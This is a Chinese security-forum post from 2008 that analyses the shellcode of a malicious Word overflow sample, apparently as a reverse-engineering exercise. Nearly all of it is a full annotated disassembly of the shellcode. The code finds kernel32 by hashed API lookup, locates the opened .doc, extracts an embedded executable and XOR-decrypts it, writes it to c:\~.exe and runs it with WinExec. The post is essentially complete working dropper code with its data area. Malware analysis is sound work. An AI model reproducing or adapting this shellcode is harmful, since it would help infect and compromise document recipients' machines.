偶是新手,这个ShellCode也没有什么新意,如果说有的话,就在API的查找上还算有点优点。
00125B88 33DB xor ebx, ebx
00125B8A 81C6 00000200 add esi, 20000
00125B90 46 inc esi
00125B91 8B06 mov eax, dword ptr [esi]
00125B93 3D 909064A1 cmp eax, A1649090 ;查找代码首位置
00125B98 ^ 75 F6 jnz short 00125B90
00125B9A 43 inc ebx
00125B9B 83FB 02 cmp ebx, 2
00125B9E ^ 75 F0 jnz short 00125B90
00125BA0 FFE6 jmp esi
00B8893E 90 nop
00B8893F 90 nop
00B88940 64:A1 30000000 mov eax, dword ptr fs:[30] ;取得kernel32.dll的基地址
00B88946 8B40 0C mov eax, dword ptr [eax+C]
00B88949 8B70 1C mov esi, dword ptr [eax+1C]
00B8894C AD lods dword ptr [esi]
00B8894D 8B70 08 mov esi, dword ptr [eax+8] ; 7C800000h
00B88950 E9 6A020000 jmp 00B88BBF
00B88955 58 pop eax ;把数据起始位置放入eax中
00B88956 81EC 00020000 sub esp, 200
00B8895C 8BFC mov edi, esp
00B8895E 8B18 mov ebx, dword ptr [eax] ; 000A2000h
00B88960 895F 04 mov dword ptr [edi+4], ebx
00B88963 8977 08 mov dword ptr [edi+8], esi ; Kernel32.dll
00B88966 83C0 04 add eax, 4
00B88969 8947 0C mov dword ptr [edi+C], eax ; "c:\~$" unicode
00B8896C 83C0 0C add eax, 0C
00B8896F 8947 10 mov dword ptr [edi+10], eax ; "c:\~.exe" unicode
00B88972 83C0 12 add eax, 12
00B88975 8987 80000000 mov dword ptr [edi+80], eax ; "c:\~.exe" ascii
;;;; 查找在堆栈中的文件名路径字符串
00B8897B 57 push edi ; 保存edi
00B8897C 8BFC mov edi, esp
00B8897E 81F7 FFFF0000 xor edi, 0FFFF
00B88984 4F dec edi
00B88985 4F dec edi
00B88986 4F dec edi
00B88987 4F dec edi
00B88988 813F 6F006300 cmp dword ptr [edi], 63006F ; "oc" unicode
00B8898E ^ 75 F7 jnz short 00B88987
00B88990 4F dec edi
00B88991 4F dec edi
00B88992 4F dec edi
00B88993 4F dec edi
00B88994 813F 2E006400 cmp dword ptr [edi], 64002E ; ".d" unicode
00B8899A ^ 75 EB jnz short 00B88987
00B8899C 68 C8000000 push 0C8
00B889A1 59 pop ecx
00B889A2 8BF7 mov esi, edi
00B889A4 4E dec esi
00B889A5 813E 3A005C00 cmp dword ptr [esi], 5C003A ; ":\" unicode
00B889AB 74 04 je short 00B889B1
00B889AD ^ E2 F5 loopd short 00B889A4
00B889AF ^ EB D6 jmp short 00B88987
00B889B1 4E dec esi
00B889B2 4E dec esi ; 查找到完整的原doc文件名路径字符串 unicode型
00B889B3 5F pop edi ; 恢复edi数据
00B889B4 8977 14 mov dword ptr [edi+14], esi ; 将doc路径放入edi+14
00B889B7 FF77 08 push dword ptr [edi+8]
00B889BA 68 EC97030C push 0C0397EC
00B889BF E8 A7010000 call 00B88B6B
00B889C4 8947 1C mov dword ptr [edi+1C], eax ;GlobalAlloc
00B889C7 FF77 08 push dword ptr [edi+8]
00B889CA 68 F622B97C push 7CB922F6
00B889CF E8 97010000 call 00B88B6B
00B889D4 8947 20 mov dword ptr [edi+20], eax ;GlobalFree
00B889D7 FF77 08 push dword ptr [edi+8]
00B889DA 68 BB17007C push 7C0017BB
00B889DF E8 87010000 call 00B88B6B
00B889E4 8947 24 mov dword ptr [edi+24], eax ;CreateFileW
00B889E7 FF77 08 push dword ptr [edi+8]
00B889EA 68 FB97FD0F push 0FFD97FB
00B889EF E8 77010000 call 00B88B6B
00B889F4 8947 28 mov dword ptr [edi+28], eax ;CloseHandle
00B889F7 FF77 08 push dword ptr [edi+8]
00B889FA 68 1665FA10 push 10FA6516
00B889FF E8 67010000 call 00B88B6B
00B88A04 8947 2C mov dword ptr [edi+2C], eax ;ReadFile
00B88A07 FF77 08 push dword ptr [edi+8]
00B88A0A 68 1F790AE8 push E80A791F
00B88A0F E8 57010000 call 00B88B6B
00B88A14 8947 30 mov dword ptr [edi+30], eax ;WriteFile
00B88A17 FF77 08 push dword ptr [edi+8]
00B88A1A 68 3BB0FFC2 push C2FFB03B
00B88A1F E8 47010000 call 00B88B6B
00B88A24 8947 34 mov dword ptr [edi+34], eax ;DeleteFileW
00B88A27 FF77 08 push dword ptr [edi+8]
00B88A2A 68 AC08DA76 push 76DA08AC
00B88A2F E8 37010000 call 00B88B6B
00B88A34 8947 38 mov dword ptr [edi+38], eax ;SetFilePointer
00B88A37 FF77 08 push dword ptr [edi+8]
00B88A3A 68 98FE8A0E push 0E8AFE98
00B88A3F E8 27010000 call 00B88B6B
00B88A44 8947 3C mov dword ptr [edi+3C], eax ;WinExec
00B88A47 FF77 08 push dword ptr [edi+8]
00B88A4A 68 7489EC99 push 99EC8974
00B88A4F E8 17010000 call 00B88B6B
00B88A54 8947 40 mov dword ptr [edi+40], eax ;CopyFileW
00B88A57 FF77 08 push dword ptr [edi+8]
00B88A5A 68 7ED8E273 push 73E2D87E
00B88A5F E8 07010000 call 00B88B6B
00B88A64 8947 44 mov dword ptr [edi+44], eax ;ExitProcess
;****************************************************************************
00B88A67 FF77 10 push dword ptr [edi+10] ;C:\~.exe unicode
00B88A6A FF57 34 call dword ptr [edi+34] ;DeleteFileW
00B88A6D FF77 0C push dword ptr [edi+C] ; c:\~$
00B88A70 FF57 34 call dword ptr [edi+34] ;DeleteFileW
00B88A73 6A 00 push 0
00B88A75 FF77 0C push dword ptr [edi+C]
00B88A78 FF77 14 push dword ptr [edi+14] ;原doc文件路径 ~$
00B88A7B FF57 40 call dword ptr [edi+40] ;CopyFileW 原文件拷贝一份到C盘根目录下
00B88A7E 6A 00 push 0
00B88A80 68 80000000 push 80
00B88A85 6A 03 push 3
00B88A87 6A 00 push 0
00B88A89 6A 00 push 0
00B88A8B 68 00000080 push 80000000
00B88A90 FF77 0C push dword ptr [edi+C]
00B88A93 FF57 24 call dword ptr [edi+24] ; kernel32.CreateFileW 打开c:\~$
00B88A96 8947 60 mov dword ptr [edi+60], eax
00B88A99 6A 02 push 2
00B88A9B 6A 00 push 0
00B88A9D 6A FC push -4
00B88A9F FF77 60 push dword ptr [edi+60]
00B88AA2 FF57 38 call dword ptr [edi+38] SetFilePointer ;位置29FA5h
00B88AA5 6A 00 push 0
00B88AA7 8D9F A0000000 lea ebx, dword ptr [edi+A0]
00B88AAD 53 push ebx
00B88AAE 6A 04 push 4 ;读取4个字节 值为 18BA5
00B88AB0 8D5F 04 lea ebx, dword ptr [edi+4]
00B88AB3 53 push ebx
00B88AB4 FF77 60 push dword ptr [edi+60]
00B88AB7 FF57 2C call dword ptr [edi+2C] ReadFile 刚才打开的c:\~$
00B88ABA FF77 04 push dword ptr [edi+4] ; size 18BA5
00B88ABD 6A 40 push 40
00B88ABF FF57 1C call dword ptr [edi+1C] GlobalAlloc
00B88AC2 8947 5C mov dword ptr [edi+5C], eax
00B88AC5 8B5F 04 mov ebx, dword ptr [edi+4]
00B88AC8 83C3 04 add ebx, 4
00B88ACB F7D3 not ebx
00B88ACD 43 inc ebx
00B88ACE 6A 02 push 2
00B88AD0 6A 00 push 0
00B88AD2 53 push ebx
00B88AD3 FF77 60 push dword ptr [edi+60]
00B88AD6 FF57 38 call dword ptr [edi+38] ; SetFilePointer ;位置11400
00B88AD9 6A 00 push 0
00B88ADB 8D9F A0000000 lea ebx, dword ptr [edi+A0]
00B88AE1 53 push ebx
00B88AE2 FF77 04 push dword ptr [edi+4] ; size 18BA5
00B88AE5 FF77 5C push dword ptr [edi+5C]
00B88AE8 FF77 60 push dword ptr [edi+60]
00B88AEB FF57 2C call dword ptr [edi+2C] ;ReadFile
00B88AEE FF77 60 push dword ptr [edi+60]
00B88AF1 FF57 28 call dword ptr [edi+28] ;CloseHandle 拷贝的 ~$ doc file
00B88AF4 8B47 04 mov eax, dword ptr [edi+4]
00B88AF7 8B5F 5C mov ebx, dword ptr [edi+5C]
00B88AFA 8033 81 xor byte ptr [ebx], 81 ; exe文件解密
00B88AFD 43 inc ebx
00B88AFE 48 dec eax
00B88AFF 83F8 00 cmp eax, 0
00B88B02 ^ 75 F6 jnz short 00B88AFA
00B88B04 6A 00 push 0
00B88B06 68 80000000 push 80
00B88B0B 6A 02 push 2
00B88B0D 6A 00 push 0
00B88B0F 6A 00 push 0
00B88B11 68 00000040 push 40000000
00B88B16 FF77 10 push dword ptr [edi+10]
00B88B19 FF57 24 call dword ptr [edi+24] ;CreateFileW 创建 c:\~.exe
00B88B1C 8947 64 mov dword ptr [edi+64], eax
00B88B1F 6A 00 push 0
00B88B21 8D9F A0000000 lea ebx, dword ptr [edi+A0]
00B88B27 53 push ebx
00B88B28 FF77 04 push dword ptr [edi+4] ; size 18BA5
00B88B2B FF77 5C push dword ptr [edi+5C]
00B88B2E 50 push eax
00B88B2F FF57 30 call dword ptr [edi+30] ;WriteFile
00B88B32 6A 00 push 0
00B88B34 8D9F A0000000 lea ebx, dword ptr [edi+A0]
00B88B3A 53 push ebx
00B88B3B 68 FF000000 push 0FF ;
00B88B40 FF77 14 push dword ptr [edi+14] ;
00B88B43 FF77 64 push dword ptr [edi+64] ; exe handle
00B88B46 FF57 30 call dword ptr [edi+30] ;WriteFile
00B88B49 FF77 64 push dword ptr [edi+64]
00B88B4C FF57 28 call dword ptr [edi+28] ;CloseHandle exe handle
00B88B4F FF77 5C push dword ptr [edi+5C]
00B88B52 FF57 20 call dword ptr [edi+20] ;GlobalFree
00B88B55 6A 00 push 0
00B88B57 FFB7 80000000 push dword ptr [edi+80]
00B88B5D FF57 3C call dword ptr [edi+3C] ;WinExec
00B88B60 FF77 0C push dword ptr [edi+C] ; c:\~$
00B88B63 FF57 34 call dword ptr [edi+34] ; DeleteFile
00B88B66 6A 00 push 0
00B88B68 FF57 44 call dword ptr [edi+44] ;ExitProcess
;**********************************************************************
; 获取API入口地址的子函数
00B88B6B 55 push ebp
00B88B6C 8BEC mov ebp, esp
00B88B6E 57 push edi
00B88B6F 8B7D 08 mov edi, dword ptr [ebp+8]
00B88B72 8B5D 0C mov ebx, dword ptr [ebp+C] ;Kernel32.dll
00B88B75 56 push esi
00B88B76 8B73 3C mov esi, dword ptr [ebx+3C]
00B88B79 8B741E 78 mov esi, dword ptr [esi+ebx+78]
00B88B7D 03F3 add esi, ebx
00B88B7F 56 push esi
00B88B80 8B76 20 mov esi, dword ptr [esi+20]
00B88B83 03F3 add esi, ebx
00B88B85 33C9 xor ecx, ecx
00B88B87 49 dec ecx
00B88B88 41 inc ecx
00B88B89 AD lods dword ptr [esi]
00B88B8A 03C3 add eax, ebx
00B88B8C 56 push esi
00B88B8D 33F6 xor esi, esi
00B88B8F 0FBE10 movsx edx, byte ptr [eax]
00B88B92 3AF2 cmp dh, dl
00B88B94 74 08 je short 00B88B9E
00B88B96 C1CE 0D ror esi, 0D
00B88B99 03F2 add esi, edx
00B88B9B 40 inc eax
00B88B9C ^ EB F1 jmp short 00B88B8F
00B88B9E 3BFE cmp edi, esi
00B88BA0 5E pop esi
00B88BA1 ^ 75 E5 jnz short 00B88B88
00B88BA3 5A pop edx
00B88BA4 8BEB mov ebp, ebx
00B88BA6 8B5A 24 mov ebx, dword ptr [edx+24]
00B88BA9 03DD add ebx, ebp
00B88BAB 66:8B0C4B mov cx, word ptr [ebx+ecx*2]
00B88BAF 8B5A 1C mov ebx, dword ptr [edx+1C]
00B88BB2 03DD add ebx, ebp
00B88BB4 8B048B mov eax, dword ptr [ebx+ecx*4]
00B88BB7 03C5 add eax, ebp
00B88BB9 5E pop esi
00B88BBA 5F pop edi
00B88BBB 5D pop ebp
00B88BBC C2 0800 retn 8
00B88BBF E8 91FDFFFF call 00B88955
; 下面的数据区
00B88BC4 00 20 0A 00 63 00 3A 00 5C 00 7E 00 24 00 00 00 . ..c.:.\.~.$...
00B88BD4 63 00 3A 00 5C 00 7E 00 2E 00 65 00 78 00 65 00 c.:.\.~...e.x.e.
00B88BE4 00 00 63 3A 5C 7E 2E 65 78 65 ..c:\~.exe
- 标 题:一个word溢出样本ShellCode的分析
- 作 者:alexcom
- 时 间:2008-10-28 11:59
- 链 接:http://bbs.pediy.com/showthread.php?t=75517